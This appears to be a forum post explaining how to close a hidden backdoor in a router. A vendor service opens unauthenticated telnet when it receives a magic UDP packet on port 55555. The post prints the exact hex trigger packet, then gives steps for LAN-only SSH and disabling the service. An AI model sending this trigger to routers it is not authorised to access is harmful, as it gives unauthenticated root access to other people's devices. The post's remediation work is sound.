Ok I've worked on this a bit more.
There is a service called ledetools that handles listening on udp port 55555. When it gets the right data (hex is a few posts above), it runs telnetd. telnetd also seems to listen on udp port 55555 as well as the normal tcp 23. Either way these are both unauthenticated and listen on the WAN port - not great.
I've disabled the 55555 "feature" and enabled dropbear SSH listening only on the LAN side.
Use Packet Sender or whatever you like to send this hex to udp port 55555 on the router:
0d 7d 74 6f ca 70 e8 0e ac 3f ec 1b d8 25 5a 98 8f 18 af 35 a4 58 19 ed 52 08 47 4b f5 63 ea 97 99 f0 dc 69 f5 f8 90 11 81 9b cd 05 94 0f 08 43 9e cd 62 38 d3 b3 ee 7f d9 32 bb 5e 5d 0c ac 21
Now you should be able to telnet in with no password
Add these lines to /etc/config/dropbear:
option enable '1'
option Interface 'lan'
In /etc/init.d/dropbear, uncomment the START and STOP lines and change START (not sure if this is necessary but I did it to make sure dropbear started up after network interfaces)
#START=50
#STOP=50
change to
START=99
STOP=50
run "/etc/init.d/dropbear enable"
restart the router, verify you can get in with SSH and that it is only listening on the LAN IP:
root@CAP:~# netstat -anp | grep drop
tcp 0 0 10.10.0.1:22 0.0.0.0:* LISTEN 3177/dropbear
tcp 0 0 10.10.0.1:22 10.10.0.2:53060 ESTABLISHED 4326/dropbear
run "/etc/init.d/ledetools disable"
restart the router, go back in with ssh and verify nothing is listening on 55555
netstat -an | grep 55555
I'm guessing using the restore feature will probably undo all of this